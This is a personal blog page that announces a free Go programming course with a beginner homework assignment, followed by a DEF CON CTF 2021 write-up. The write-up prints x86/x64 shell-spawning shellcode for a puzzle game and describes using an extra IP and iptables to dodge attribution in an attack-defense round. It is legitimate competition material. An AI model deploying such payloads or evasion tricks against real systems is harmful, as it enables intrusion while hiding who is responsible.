Hanbang Wang

Introduction to Go

2022-01-09T15:05:00-05:00

Go 101

Both of my TA’ing classes, CIS 521 and CIS 380, are not offered this semester. So to spend the time elsewhere, I’m going to offer a whole new, experimental zero credit course: Go 101: Introduction to Go.

The class will focus on Go syntax, some simple data structure, and Goroutine usage. If we have time, some real-world applications, like OS or network, might be introduced as well.

The class is suitable for anyone who’s interested in Computer Science and Software Engineering, even for people with no prior knowledge in coding. I will try to make the class as approachable as possible. However, if you are interested in learning a language so that you could use an existing framework or tools, like stats, AI, big data, quant, etc., this class might not be ideal for you.

This course is NOT affiliated with Penn. You get absolutely no course credit or any certification whatsoever. This class, in turn, is absolutely free of charge and all course materials will be released into public domain.

I will still leave homework and they will be graded, and potentially I will give out tests/quizzes/exams. These assignments will not have deadlines.

I plan to hold Office Hours if there are many students and demands are high. Otherwise, email or Piazza should suffice.

Resource

Piazza: https://piazza.com/upenn/spring2022/go101
Gradescope: Entry Code WYREYW
Go website: The Go Programming Language
Go 101 (Textbook): https://go101.org/article/101.html

Let me know via Email if you are not a Penn student but still want to access the quiz.

Schedule

The meeting time is weekly on Thursday 7 PM to 8:30 PM Eastern Time, from January 13th to April 21st, so 15 meetings in total. This is so far tentative.

Meeting is held remotely via Zoom: https://upenn.zoom.us/j/93107977009?pwd=ZnFIR0M3VHdWbG1VOS9remJONFJ2UT09. Class will be recorded.

Slides may or may not be made, depending on the content.

Jan 13

Topic

Class intro
Programming language intro (and why Go)
Binary data and memory intro
Primitive data types in Go

Homework

A quiz is released on Gradescope.

Recording

https://upenn.zoom.us/rec/share/2Zo7h1x8wjBLc0T076D9qAktdORwy2HBi47cW0GDP0vx5yarPxjdzb9pilupCb-_.5AI9jICXkrAZArfN Passcode: 2*+R2EFB

Jan 20

Topic

Packages and function intro
Variables intro
Primitive literals
- Integer
- Floating-point
- Complex
- Boolean
- String

Basic Types and Basic Value Literals -Go 101

Homework

A quiz is released on Gradescope.

Recording

https://upenn.zoom.us/rec/share/CwUbPM2_T1sbMhVBAY_vGwysJMd234extmseDMVD64romoRXQ93lKK-hKah71yYx.1-kwbZNHCoTtvOMs Passcode: Dg8!dHA5

Jan 27

Topic

Basic Operators
Variables (continued) and Constants
Type conversion
~~Scope~~

Homework

A quiz is released on Gradescope.

Recording

https://upenn.zoom.us/rec/share/WbADhx89M5ynkIG0o7XEaIzWXMBzuZwNXjlOXLmrOLwaSMAV67qlZ5yeCd62Pr6i.4hZ9JBlD_cSda3ti (Passcode: Nj@T5!x^)

Feb 3

Topic

Scope
Intro to functions
Package and Import
Array
Write and compile code demo

Code Packages and Package Imports -Go 101
Function Declarations and Function Calls -Go 101 (only relevant part)
Arrays, Slices and Maps in Go -Go 101 (only relevant part)

Recording

https://upenn.zoom.us/rec/share/Pb3fBvqMnUu6887REkODH1OKu8kWRfNg4HlEPrfrWzCKNtp8PMJ047lBs4a_Iitd.TTIQK1i6qyoEpTXK (Passcode: Hyw3b=nw)

Homework

A programming assignment is released on Gradescope.

Homework

Operators & Functions

In this first assignment, you are asked to write some functions with the given signature, and then implement the required functionalities within it.

There are five parts to the assignment. Due to Go being a compiled language, and in this homework we are testing the ability to write functions, so you have to finish (almost) the entire homework in order to pass the compilation. The autograder will then test if the implemented functions has the correct functionality.

Before you start, please follow the instructions to install Go on your local computer (you should have it if you have finished Quiz 1). Then, follow the demo at the end of Feb 3 class, where we showed how to prepare a Go environment on your computer.

Once you have done that, create a file named main.go under your working directory. This is the file in where you are going to write Go program for this homework, and only this file. After you finished the homework, you should submit ONLY this file onto Gradescope.

For this homework, use package name main.

Part 1

Declare a constant at package-level of the main package, named CourseName, which has type string and value "Go 101".

Recall that a constant declaration starts with const, and that package-level is the top-level of a file (i.e. not in a code block). Also recall that identifiers are case sensitive.

Part 2

Declare a variable at package-level of the main package, named Counter, which has type uint8 and its zero-value. Recall that variable declaration starts with var.

After that, declare a function named IncCounter, which has no arguments and no return values. Each time IncCounter is called, increase Counter by one. Recall operators +, +=, or ++.

Your code should not access Counter anywhere else.

Part 3

Declare a function named BoolOperation, which takes in two bool arguments and returns four bool values.

The first return value is the logical and of the two input arguments; the second return value is the logical or of the two input arguments; the third return value is the logical not of the first input argument; the fourth return value is the logical not of the second input argument.

Recall that logical and uses the binary operator &&, logical or uses the binary operator ||, and logical not uses the unary operator !. Also recall returning values using the return keyword.

Part 4

Declare a function named IntArrayOperation, which takes in a single int array of size 4, and returns three int values.

The first return value is the sum of the first element in the array and the second element in the array; The second return value is the sum of the third element in the array and the fourth element in the array; The third return value is the product (multiplication) of the previous two return values (i.e. the product of the sum of the first and second and the sum of the third and fourth element in the argument array).

Recall operator + and *, also make sure to take care of calculation precedence. Recall the type of an array of type T with size N is [N]T. Recall that accessing the ith element of an array arr uses the indexing arr[i], and that index starts from 0.

You can assume that doing the above operations won’t cause overflows.

Part 5

Declare a function named PackFloatArray, which takes in four float64 as its argument, and returns a single float64 array of size 4.

As the name goes, the return value should be a float64 array whose stored values are the four given arguments, stored with the order they were given. More specifically, the first value in the array should be the first argument given to the function, the second value in the array should be the second argument given to the function, so on and so forth.

To return an array, return it the same way as any other values.

After implementing these five parts, first you should check if your code successfully compiles. Notice that success compilation doesn’t mean that the program is correct, but it does mean that all the types and operations are valid.

Later we will talk about how to properly write test cases for your code. For now, we can just use main function as a way to test our program. Within the main function, write some value and then call the function with the value. Output the results using println or fmt.Println. If the output result seems correct, then you are good.

Submit main.go onto Gradescope and get a score to see how well you did!

DEF CON CTF 2021

2021-08-22T12:30:00-04:00

A week before the game, Tea Deliverers split up into four sub-teams and held an inner competition using some of the past challenges with some minor tweaks. I was the only one doing the KoH challenge in our team, and I was doing fairly okay, so I decided to be a KoH player for the finals. I was sure the challenges would keep me busy whilst not stress me out during the game, as there would be one and only one completely new challenge each day.

Turned out I was right. I enjoyed each and every King of the Hill challenge, and I got enough rest during the time off when it’s daytime in China, very healthy lifestyle indeed.

zero-is-you

This was a copy of the game Baba is You. What’s nice about the original game is that it’s already Turing complete, and just to add shellcode execution onto it, woah, you just opened the gate to another dimension. (insert mind-blown meme pic here)

For those without prior experience in Baba is You, the game is a Sokoban-kind puzzle game, where the player can push different blocks into different places. There are some famous modern development of this classic genre, like A Good Snowman Is Hard To Build or Stephen’s Sausage Roll. The twist with Baba is You is that the blocks themselves can be a part of an instruction that tells how the game world functions. I will explain this more in the following.

I really recommend you trying out Baba is You, but for a smol brain like me, I can’t finish the game without referencing a walkthrough, sad.

Extract Game Code

Within the provided package game_client.tgz, there were a few files, README, start, sync, and a build folder. README told us how the game worked. start was a shell script that simply run zero-is-you binary within the build folder.

For sync, since we needed to run it by python3, it must be a Python program. It was not a text file, so it must be a compiled Python byte-code like .pyc. Using an existing decompiler like rocky/python-decompile3, we were able to decompile sync into a Python source code. There’s nothing interested about sync, it just uploads and downloads to and from the server. As for what data it actually transmitted, we’ll get back to it in a sec.

After @riatre gave us the hint that the entire game is written in Python, as a Game Data-Mine Professional™, without playing the game first, I dove directly into extracting the game data. A quick strings of the zero-is-you elf binary showed things like _MEIPASS2, and a quick Google search told us that this was a program packed by PyInstaller. Using an existing extractor extremecoders-re/pyinstxtractor, we were able to extract every .pyc from the binary. And using the aforementioned decompiler, we could turn these bytecodes back into their .py form. Although there were some decompile errors, we were getting most part of the game in source code form.

Once we had the extracted game, my teammates could run the game on Windows and MacOS without problems. We also implemented custom functionalities to the game, such as undoing a move, which was just to replay the moves. The decompiled source code also helped us figure out the format of level files and rules of the game, which I will talk about later.

Ready Player One

OOO’s internet is down so we were not able to use sync to communicate with the server, but they kindly sent us the level1 file so that we can look into this level first.

With some prior experience with Baba is You, I immediately knew what’s going on. On the top we had two “rules,” zero is you and ice is stop. The former meant that we were currently in control of zero, and the latter meant that everything should stop in front of ice. So zero referred to the little hacker boy icon in the middle of the screen, this could be easily checked by moving zero using arrow keys; ice referred to ice blocks surrounding the middle part of the screen, and a line of ice blocks at the top.

Any such “rule” consisted of three blocks that looked like [xxx] [is] [yyy] reading from left to right or top to bottom would be enforced in the game world. You could make a new rule by pushing the blocks around and putting them together, or break existing rules by splitting the blocks up. The special rule is that [noun] is you will make the player able to control that [noun] thing on the board, just like Baba is You.

However, the processor-looking block and a line of hex values at the top of the screen was something not in Baba is You. With a further look into the source code and a few trial-and-errors with the blocks, we figured out how the entire game works:

Shellcode Mechanism

The entire screen we saw, which was a $25 \times 15$ space of blocks, was actually the memory of the machine, meaning the address of the machine ranged from 0x0 to 0x176. The memory read from left to right, so the layout was

\[\begin{matrix} \texttt{0x00} & \texttt{0x01} &\cdots &\texttt{0x18} \\ \texttt{0x19} &\texttt{0x20}&\cdots \\ \vdots & \vdots &\ddots & \\ \texttt{0x15e} &\texttt{0x25f}& \cdots & \texttt{0x176} \end{matrix}\]

The hex bytes displayed on those blocks were then the values on that memory address. If the value is zero, then that block would be displayed as empty. However, you could switch the display style by pressing ` (backquote), which let you hide the game block and display the empty zero values.

The block that looked like a processor, which is on the top-left corner of the game, would act as a program counter (or instruction pointer) that would execute the memory, if and only if an architecture was specified (cpu is [arch] was on the board) and cpu is run was on the board at the same time. If cpu is run was on the board but no architecture was specified, a segfault would be thrown.

When cpu is run was on the board, every time the player made a move, either using arrow keys or the Space key to stay where you were, the machine would execute the instruction at the program counter (location of the processor block).

The level would be cleared when a syscall to SYS_EXECV was invoked with the argument being either /bin/sh or /bin/bash after sanitized by os.path.abspath in Python. For example, for x64 arch, that means if we could put an address to a string /bin/sh in rdi and 0x3b in al, and then invoke a syscall, we could pass the level.

Level File Decryption

The level file decryption was inside the file utils.py after unpacking and decompiling. It looked something like this:

def load_level_data(filename):
    key = b'zero'
    l = len(key)
    with open(filename, 'rb') as (f):
        data = f.read()[3:]
        compressed = bytearray((data[i] ^ key[(i % l)] for i in range(0, len(data))))
        data = zlib.decompress(compressed)
    return data.decode('utf8')

Figured this out, we could view the level file in its clear text form. Level 1’s file after decryption looked like this:

Ready Player One
W wall
w _WALL
I ice
i _ICE
Z zero
s _is
t _STOP
z _ZERO
m _YOU
1 cpu
c _CPU
x _x64
b _BUG
r _RUN
B bug

1........................  90 48 83 c4 50 50 48 bb 2f 62 69 6e 2f 2f 73 68 53 54 5f b0 3b 0f 05
IIIIIIIIIIIIIIIIIIIIIIIII  
zsm...................ist
.........................
.......IIIIIIIIIII.......
.......I.........I.......
.......I....s....I.......
.......I...cxr...I.......
.......I....s....I.......
.......I.........I.......
.......I....Z....I.......
.......IIIIIIIIIII.......
.........................
.........................
.........................
.........................

The first line says the title name of the level. The following lines before an empty line says what each character meant in the game board representation down below. And then we have a $25 \times 15$ board made out of ASCII characters, each line followed by a maximum of $25$ hex values, representing the memory values on the board. If the line is trailing with 00s, then those values are omitted.

We could build custom levels as well by reversing what the function does. We could also alter the existing levels to make testing out solutions much easier.

Playing the Game

Now going back to the first level, there was only one cpu block and one arch x64 we could use, meaning we had to somehow first set cpu is x64 and then set cpu is run without breaking the first one. Recall that the rules were parsed from left to right AND from up to down. Therefore, we could put cpu at the upper-left corner, so it could be used by two rules at the same time, something like this:

\[\begin{matrix} \texttt{cpu} & \texttt{is} & \texttt{x64}\\ \texttt{is}\\ \texttt{run} \end{matrix}\]

After I did that and moved around to execute the instructions, we cleared the level. But before we go to the next level, let’s first take a look at the shellcode for the first level:

0:  90                      nop
1:  48 83 c4 50             add    rsp,0x50
5:  50                      push   rax
6:  48 bb 2f 62 69 6e 2f    movabs rbx,0x68732f2f6e69622f
d:  2f 73 68
10: 53                      push   rbx
11: 54                      push   rsp
12: 5f                      pop    rdi
13: b0 3b                   mov    al,0x3b
15: 0f 05                   syscall

As we can see, this is a pretty normal shellcode that does a syscall with al being 0x3b and rdi points to a string in the memory that is /bin//sh. The extra slash does not matter because it would be sanitized out by os.path.abspath in Python.

Flatline

This time we had a x86 machine, and a quick disassembling told us

0:  83 c4 20                add    esp,0x20
3:  50                      push   eax
4:  68 2f 2f 73 68          push   0x68732f2f
9:  68 2f 62 69 6e          push   0x6e69622f
e:  89 e3                   mov    ebx,esp
10: 89 c1                   mov    ecx,eax
12: 89 c2                   mov    edx,eax
14: b0 0b                   mov    al,0xb
16: cd 80                   int    0x80

That we had a completely valid shellcode here already, so the only thing we needed to do is to run cpu. The only cpu is run was at the left side of the game board, so we had to get there. However, we were surrounded by a wall of virus blocks, and virus had two rules enforced on them at the start of the game: virus is stop and virus is kill. We could only disable virus is stop by pushing away any of the blocks in that rule, but after that, when we tried to step onto a virus block, we would be killed immediately with a “game over” screen.

It seemed impossible to disable the rule without leaving the “virus jail,” but we had to leave the jail first to move the block away, so it’s a paradox! However, this was just another famous trick in Baba is You, where you realize that the “kill” command only applies to the player but not other things in the game world, so other blocks can move freely through the virus block, assuming virus is stop is not in effect.

The solution then is something like this:

Where you first line up the blocks at the bottom horizontally, then push the blocks from the right so the blocks pushes each other and extends out, until they reach virus is stop and split that rule. After that, our Zero can walk pass through the virus blocks and push together cpu is run to finish the game. This strategy came in handy in the later part of the game as well.

ICE Crash

For this level, we had cpu is x64 and cpu is run already in effect. However, if we just wander around and let the program executes, the processor would move to the next line and hits the ice, resulting in a segfault, because ice is stop was also in effect.

Let’s then look at this level’s shellcode

0:  48 83 c4 18             add    rsp,0x18
...
c:  50                      push   rax
...
19: 48 bb 2f 62 69 6e 2f    movabs rbx,0x68732f2f6e69622f
20: 2f 73 68
23: 53                      push   rbx
24: 54                      push   rsp
25: 5f                      pop    rdi
...
32: b0 3b                   mov    al,0x3b
34: 0f 05                   syscall

The zeros were hidden since 00 00 was very similar to nop in our case. This was a normal shellcode, and if we could execute the entirety of this shellcode, we could pass this level. Therefore, we must had somehow made the processor execute the program without being stoped.

It looked like there were two ice is stop on the board right now, so we could just break them up and that should solve the problem, right? A few tries told us that we just didn’t have enough time to break the blocks up before the processor reached an ice block.

Notice that for all the levels before, we had most of the rules formed in a way that looks like [noun] is [verb], but it’s possible to turn something into something else by setting up a rule as [noun] is [noun]. Looking at the board, we had zero is you exposed to the player. That meant it was possible to form ice is zero or ice is you in the game.

In fact, both solutions work: ice is zero would turn the ice into a bunch of Zero so the processor would not be stopped since the ice blocks are gone. And ice is you would make the player be able to control the ice so we could move the ice blocks out of the way.

High-speed Pizza Delivery

Here we had cpu is x64 and ice is stop at the bottom of the screen where we were unable to reach. And we had a bunch of new blocks that looked like different registers. Ignoring that first and putting cpu is run together, we could see the processor reached the end of the shellcode and then a segfault was thrown. Let’s take a look at the shellcode then:

0:  90                      nop
1:  90                      nop
2:  48 83 c4 50             add    rsp,0x50
6:  48 bb 2f 62 69 6e 2f    movabs rbx,0x68732f2f6e69622f
d:  2f 73 68
10: 50                      push   rax
11: 53                      push   rbx
12: 54                      push   rsp
13: 58                      pop    rax
14: b0 3b                   mov    al,0x3b
16: 0f 05                   syscall

Huh, everything looked normal, though with a closer look, we could see that the address of the string was stored at rax instead of the supposed rdi register. Then, combined with the newly appeared blocks that had register names on them, it came to us that we needed to make rax is rdi so that when the machine was executing pop rax, it was actually executing pop rdi.

However, if we first formed rax is rdi and let the program run, we still would get a segfault. Then we tried a lot of things, like using rdi is rax instead. One of my teammates finally realized that we might only want the rule to be in effect when we were executing that single instruction pop rax, so he pushed cpu is run vertically, let it run to address 0x13, stopped the run by splitting the blocks, went to the right part and formed rdi is rax, came back and continued the run for 1 tick, and then disabled that rule, came back to run the last syscall, and finally we got it working.

Ten Thousands Steps

Well, the title said ten thousands steps, but if you actually used more than 1000 steps, you would get a screen saying you have run out of time.

We were again locked up in a jail, made out of ice blocks this time. However, there’s a lock block and lock is push inside the jail, so we could simply push from left to right to enable that rule and walk out of the jail. However, if we just went straight to cpu is run, the processor would inevitably stumble onto an ice block and stops running (throwing a segfault).

With a closer look at the exiting shellcode on the board, I realized we actually had every instruction we needed on the board, but they were just scattered around the memory. Looking at what we had on the board, I came up with a solution:

Enable lock is push to escape the jail.
Push cpu is run all into the jail so that it can form cpu is push horizontally and cpu is run vertically at the same time. Notice that since push is at the right most edge of the board, it is impossible to push it out.
Execute the following instructions one by one, by pushing the processor block to the start of that instruction, go back into the jail to enable cpu is run, and immediately disable it so the machine will run exactly one instruction. Go back to push the processor block to the head of the next instruction we want to execute, and repeat the process.
1. 48 83 c4 2a (add rsp,0x2a) to set up the stack.
2. 48 bf 2f 62 69 6e 2f 2f 73 68 (movabs rdi,0x68732f2f6e69622f) to store the string into rdi.
3. 57 (push rdi) to push the string onto the stack.
4. 54 (push rsp) to store the string address onto the stack.
5. 5f (pop rdi) to pop the string address back into rdi.
6. 6a 3b (push 0x3b) to push the syscall number onto the stack.
7. 58 (pop rax) to pop the syscall number back into rax.
8. ……

Wait a minute, where’s the syscall instruction? Then my teammate hinted me, it’s actually hidden under an ice block. So a look at the game level file, it really was hidden under the bottom line of ice cubes. This meant that we would have to change our strategy up a bit.

So my solution was, once we escaped the jail, we could push lock text block all the way down to the left-bottom side, and use the is block out there to form ice is lock so all the ice blocks will turn into lock blocks. Then, pushing the lock text block all the way back to form lock is push, so we could push away the jail wall and reveal the syscall instruction bytes. Then we could continue our plan from step 2.

In the end, we just needed to push the processor block to the revealed 0f 05 (syscall) and let the machine run one last time. In the end it took about 750 steps for me to beat this level by hand.

The Elegant Mantis

This level really juiced my brain. The two blocks with the “recycle” symbol drawn on them would flip the memory in respect to the game board when the player stepped on them. The left one would flip the memory horizontally (the center row wouldn’t change); the right one would flip vertically (the center column wouldn’t change). Therefore, we had four potential shellcodes: one original, one flipped horizontally, one flipped vertically, and one flipped diagonally.

I didn’t solve this level, so I will skip what I tried during the game and talk about how my teammate solved it.

Let’s first analyze the original shellcode:

0:  be 16 00 00 00          mov    esi,0x16
5:  bb 00 00 00 00          mov    ebx,0x0
a:  eb 05                   jmp    0x11
c:  01 db                   add    ebx,ebx
e:  83 c6 01                add    esi,0x1
11: 83 fe 30                cmp    esi,0x30
14: 76 f6                   jbe    0xc
16: 83 ec 90                sub    esp,0xffffff90
19: 08 53 76                or     BYTE PTR [ebx+0x76],dl
1c: f0 83 c4 12             lock add esp,0x12
20: 89 c7                   mov    edi,eax
22: 01 d8                   add    eax,ebx
24: e8 22 5a 55 90          call   0x90555a4b
29: 00 31                   add    BYTE PTR [ecx],dh
2b: c0 81 ea 18 21 4a 33    rol    BYTE PTR [ecx+0x4a2118ea],0x33
32: eb 0d                   jmp    0x41
34: 85 c0                   test   eax,eax
36: 54                      push   esp
37: 83 c4 21                add    esp,0x21
3a: 39 cb                   cmp    ebx,ecx
3c: 75 e8                   jne    0x26
3e: 5d                      pop    ebp
3f: 58                      pop    eax
40: 76 fe                   jbe    0x40
42: 01 db                   add    ebx,ebx
44: 83 ec 01                sub    esp,0x1
47: 01 fc                   add    esp,edi
49: 41                      inc    ecx
4a: 41                      inc    ecx
4b: b8 10 00 00 00          mov    eax,0x10
50: bb 2f 62 69 6e          mov    ebx,0x6e69622f
55: 89 18                   mov    DWORD PTR [eax],ebx
57: bb 2f 73 68 00          mov    ebx,0x68732f
5c: 89 58 04                mov    DWORD PTR [eax+0x4],ebx
5f: 89 c3                   mov    ebx,eax
61: 31 c9                   xor    ecx,ecx
63: 29 d2                   sub    edx,edx
65: b0 0b                   mov    al,0xb
67: cd 80                   int    0x80

If we just let this shellcode run, the machine would eventually throw a segfault at address 0x24, because the calling address was out of bounds. Taking a closer look at the end of the program, from address 0x4b to 0x67, we saw it actually set up the register and memory appropriately. That meant we could clear this level if we could let the program counter somehow reach there.

Therefore, starting from the very beginning, there were four actions we could do at every tick of the game: either to run the CPU, or flip the memory horizontally, or flip the memory vertically, or stop the CPU from running. We had a search algorithm to help us explore all different paths to take, via the help of unicorn, to decide whether to continue searching down the path or stop because of a segfault.

Finally we were able to find a path of shellcode that led to the desired instruction address mentioned above. Converting that to the list of movements in the game, and we were done with the level.

(Consensual) Hallucination

The shellcode in this level was just an infinite loop and contained no actual string of “/bin/bash” or any sort, so we could ignore it. Looking at the board, we had bug is bash, which meant that we could pass this level if we were able to touch the bug icon at the upper-right corner of the game.

This was yet another core mechanism in Baba is You, and since this time the shellcode was not important anymore, it was truly a game level. Not much to talk about then, we played it manually and found a solution:

Utilizing lock bind disk, we can push the floppy disk to the right side of the virus wall, while keeping the lock on the left side.
Use the floppy disk as a hook to get cpu is run back to the left side of the virus wall.
Use the bind mechanism to put the floppy disk on the bug icon and make it stay there by breaking lock bind disk.
Line up disk is at the bottom in front of the virus wall, and put all the remaining blocks to the left of them.
Push from left to right so the blocks pass through the virus wall and connect the zero text block on the right hand side.

This would form a new rule disk is zero so the floppy disk block turned into Zero. Since the floppy disk was on the bug icon, the Zero was then on the bug so we successfully passed this level.

UpWind

A lot of new mechanisms in this level.

There was a new portal-like block, which corresponded to the nrg text block (although I have no idea what nrg means) if nrg is edit was in effect and the player stood on one of the portal-like blocks, a pop-up would appear and the game would allow you to input a hex value. The value would then be written into that memory.

And there was a new “fan” mechanism, where if the fan is wind was in effect, all pushable blocks on the same row as the fan would all move left for one block, if possible.

We tried a lot of things and then had some basic understandings:

We had to go to the bottom of the level and trigger cpu is run, however
It was impossible to bring the processor into the wind tunnel because it would stick at the end and not allow us to pass through it, and
It was also impossible to use the processor at the upper part of the level, because there weren’t enough portals for us to input a valid shellcode, and we couldn’t even use jmp cause that requireed two bytes, but
there was nrg text block at the bottom of the level, so we could turn nrg into a CPU.

So our idea was to push all the portal blocks into the wind tunnel, input a shellcode using the edit function, and leave the leftmost one untouched so that we can turn it into a CPU later.

However, we ignored one of the largest problems: there’s a wind blowing in the tunnel and it would blow the CPU to the left one block each tick. Quickly, we came up with two potential solutions for this:

We write shellcode such that even if the processor was blown back by one block, it would still run without issues. That meant the ending byte of the previous instruction would be the start of the next instruction.
We write shellcode in reverse from right to left, so the wind would help us blow the CPU to the correct position. Since we could control when the CPU runs, we could execute one instruction when we saw the CPU reached a certain position, and then to stop the execution, and wait until it reaches the next instruction on the left.

The first one required some real hardcore shellcode technique, and the second one required precision timing, both were not easy to do. Therefore, we splitted into two teams, one trying the first solution and another trying the second. Eventually the first team had their answers out, and I had no idea how they did it.

Code Choreography

This level was very similar to level 5 Ten Thousands Steps.

A closer look at the existing shellcode on the board, we realized that we had everything except for cd 80 (int 0x80). There was cd 81 already on the board, so all we needed to do is to turn that 81 into 80, the question was, how?

We disassembled the entire memory at each offset and tried to find a combination of these that may work:

We first took a look at address 0xd1, which was dec DWORD PTR [ecx+0xc1], so we thought that we have to somehow put 0x32 into ecx such that they sum up to be 0xf3, which was the memory address of that byte 81 we wanted to decrease. There were inc eax and mov ecx, eax on the board, so my teammate wrote a script that could automatically repeat the process of controlling the character to push the processor to one location, come back and execute that instruction. However, this quickly exceeded the 1000 steps limit, so we had to look for something else.

We then turned our eyes to the other dec on the board at address 0x9e. Immediately we saw mov bl, BYTE PTR [eax] and mov BYTE PTR [eax], bl around it. After more digging, we found another really interesting instruction or eax, DWORD PTR [eax+0x40] at address 0xec. With some brute-forcing, we found that there’s an instruction mov al, 0x61, and at exactly address 0xa1 we had a value 0x90. ORing 0x90 with 0x61 we get 0xf1. Then all we need to do is to add eax twice, and viola, we find a way to decrease the value at 0xf3.

Together the chain to decrease the value looked like this:

e6:   b0 61                   mov    al, 0x61
ec:   0b 40 40                or     eax, DWORD PTR [eax+0x40]
ed:   40                      inc    eax
ee:   40                      inc    eax
9c:   8a 18                   mov    bl, BYTE PTR [eax]
9e:   4b                      dec    ebx
9f:   88 18                   mov    BYTE PTR [eax], bl

Then all that’s left to do was to build the remaining instructions.

NetMaze

Really the simplest non-gaming level here. All I did was writing a DFS to walk randomly, and before long I found a path to walk from the top-left to the bottom-right corner of the maze.

The only thing was that, I realized that the console output is not consistent. Sometimes even if the game displays the segfault screen, the console may not output a line saying segfault. So I patched the source script a bit so the output is consistent with the actual state.

Bub and Bob

Another pure game level. Our solution was something like this:

Fall from the left and push ball is stop all the way to the right so that bub is stop extends out.
Ride the bubble back to the top.
Fall from the right and bring bub down.
Repeat 2 and 3 and bring is down.
Form bub is you horizontally so you can control the little green dragon (called bub). At the same time break zero is you.
Move bub to the middle of the screen and push up the middle is so cpu is run is in effect.
Push ball is back out from right to left, and push them from bottom to the top of the screen.
Prepare ball is at the right of cpu is x64, but don’t connect them yet.
At the right timing, connect ball is cpu and move straight to the start of the shellcode (starting at 83). Once the bubble is produced it will turn into the CPU and start running.

Let it run to the end and we’re done. Unfortunately at the exact moment we solved this level, the server is down, and that marked the end of day 1.

Here’s the solutions to all 15 levels: Zero is You | 15 solutions - YouTube.

Optimization

While a bunch of people were trying to solve the puzzle, another group of our KoH players was doing their best to try to optimize the existing solutions. Other than trying to optimize by hand, they wrote a fuzzing tool to randomly (maybe with a heuristic) delete a part out of the solution or replace a part with a smaller part.

With their effort, we successfully shrunk many of our past solutions. However, with the game scoring method, every 5 moves we saved only would give us 1 point. That being said, this fuzzing method made its work on the final day……

Overall, we didn’t do well in the first day. Everyone was so good at playing games and we just weren’t fast enough. We were able to get to the fifth place when the game ends, but the way the KoH score works means that all other teams are so ahead of us. We got to keep up in the following days!

www

This King of the Hill game combined Attack/Defense, Penetration Testing, and maybe even Web altogether. A really messy experience, but in a fun way.

The Rule

The rule was simple: at each round, each team could use a flag string to exchange for a graffiti string. The graffiti string then could be put onto other team’s walls. Each team could get 1 point if they put a graffiti string onto some other team’s wall.

The twist was, if a team could figure out which team put a graffiti on their wall, and their team’s real ip , they could accuse the team for vandalizing. If the accusation was successful, not only that 1 point that team got for putting up the graffiti would be gone, they would also be deducted 4 points for vandalizing (and being spotted).

There were two APIs on each team’s server:

/graffiti_store, using which we could exchange a flag string for a graffiti string.
/accuse, which could be used to report a graffiti and ip.

And each team would have a game box that needs to be ssh’d in. Within the game server, the port 1337 of each team’s box was the wall. Connecting to it, a team could spray their graffiti onto others’ walls.

There were two more rules for the fairness and effectiveness of the game:

Teams could accuse retrospectively up to 6 rounds back in the past.
A team only had one chance to accuse a certain graffiti.
A team had to pass services availability check each round, otherwise 15 points would be deducted that round.

The Observation

Few thoughts and observations we had after we read the rules, logged onto our game box, and tried to manually spray graffiti onto other teams’ walls and accuse other team’s graffiti.

We have the IP address 13.37.228.64, and other teams are scattered around in 13.37.xx.64. This xx did not correspond to the team ID, therefore a scan of the subnet is needed to find out other teams’ machines. However, when accusing, you only need to report the IP of each team’s box inside the network, not the IP that each team has that contains their team ID (i.e. not 10.13.37.xx).
There’s a folder in the game box that includes a flag file and a bunch of pcaps. The flag content will change every round.
The IP address that we used to spray graffiti (send TCP connection with) is recorded along with the graffiti string itself. This means that if we were to simply use our real IP address to spray graffiti, and other teams had a automatic accusing system, then for sure we are going to get our points deducted.
From 2, it means it definitely was a dominated strategy to spray graffiti with a team’s real IP. Therefore, there must be someway to hide a team’s real IP. Combining this fact with the challenge’s description, and a later hint, there’s definitely some machines out there in the game network, over which we could take control.
Furthermore, there must be other flags out there in these pwnable servers that we could use to buy graffiti with. This is also hinted in the rules of the game.
Continuing 4, there must be a way to spot the real IP of the vandalizing team, even if they used a jump/zombie server to spray graffiti. In other words, correspond jump/zombie servers’ IPs back to the real IP the team had, assuming each jump server is used only by one team.

Even though we knew that it is not a good strategy to spray graffiti with our real IP, before anyone had time to write an auto accusing script, we had some chance to get points, before we successfully pwned a service. We could always turn this off if we started to see our points were deducted.

Quickly, I started writing the script to automatically acquire the flag string, exchange it for a graffiti and spray it onto every other teams’ walls. A few annoying things we realized once we started:

The graffiti exchange endpoint is outside the game server, so I had to port forward it using SSH.
The SSH server has a really short ClientAliveInterval, so we had to manually adjust the ServerAliveInterval from our SSH Client.
There’s a maximum connection limit for the SSH port. So one of us had to do a proxy and let everyone else connect to it via that.

While I was writing that, one of my teammates was writing an accusing script. Other members of KoH were then scanning the subnet and trying to find other machines that we could take over.

The Turnabout

While my spraying script was running, some of my teammates realized a interesting thing: If you used a flag string from a past round to exchange for a graffiti this round, you would get a completely new graffiti without error messages. Since in the rule it clearly says that both the flag and graffiti lasts for only one round, I thought it may be just a bug, and you couldn’t really get a point using that graffiti string exchanged from an expired flag.

Nonetheless, there were no downsides to collect all the past flags, so I quickly added more code to my script, so it would collect the current flag and save it along with all the past ones. At every new round, the script would exchange all the saved flags into graffiti strings and spray them onto every other teams’ walls.

This completely changed the game. It was actually counted as a successful spray, in fact, to spray graffiti exchanged with a flag from past rounds. This meant for anyone that knows this bug, their scores could increase linearly each round: Assuming a team has $c$ “flag sources” (one plus how many machines the team took over), and that they had been collecting flags for $n$ rounds, then they could get $c\cdot n$ points in that round, and in total their points would be on the magnitude of $\Theta(c\cdot n^2)$.

Even without a second machine, we could see our points grow faster than ever. In the case where there were no further progress on pwning other machines, this is the only hope we have.

The Smoke

During this time, we kinda worried (and almost certain) that some other team have an auto-accusing script running, and we would get more points deducted if we were to spray more graffiti. Therefore, we wrote a “smoking” machine, basically just to randomly generate hex-value strings that looks like graffiti strings, but in fact were just counterfeits, to spray onto other teams’ walls.

Doing this, the real graffiti string would be hidden within a pool of fake ones. We thought that teams with a not good enough script would have a hard time accusing, because there were to many accusations they had to make. This should also increase the difficulty of analyzing our behaviors.

Or at least that’s the hope. As for weather it had any effect or not, we didn’t know.

The Fake IP

Spoiler alert: till the end of the game, we weren’t able to find or pwn any other services. However, that doesn’t mean we didn’t get our own fake IP to spray graffiti with.

@cbmixx realized that, since we had root privileges on our own machine, it was possible to give ourselves another IP within a subnet that we had control over with.

I don’t quite remember what exact prefix we had control with, might be /26 or something.

After some trials, we were able to assign our machine a new IP address 13.37.228.65 (and later 13.37.228.66). Adding a rule to iptables, all our outgoing traffic to port 1337 of other teams’ machines were all going through the new IP address. For teams with a automated accusing script, this should prevent them from accusing us for a long time.

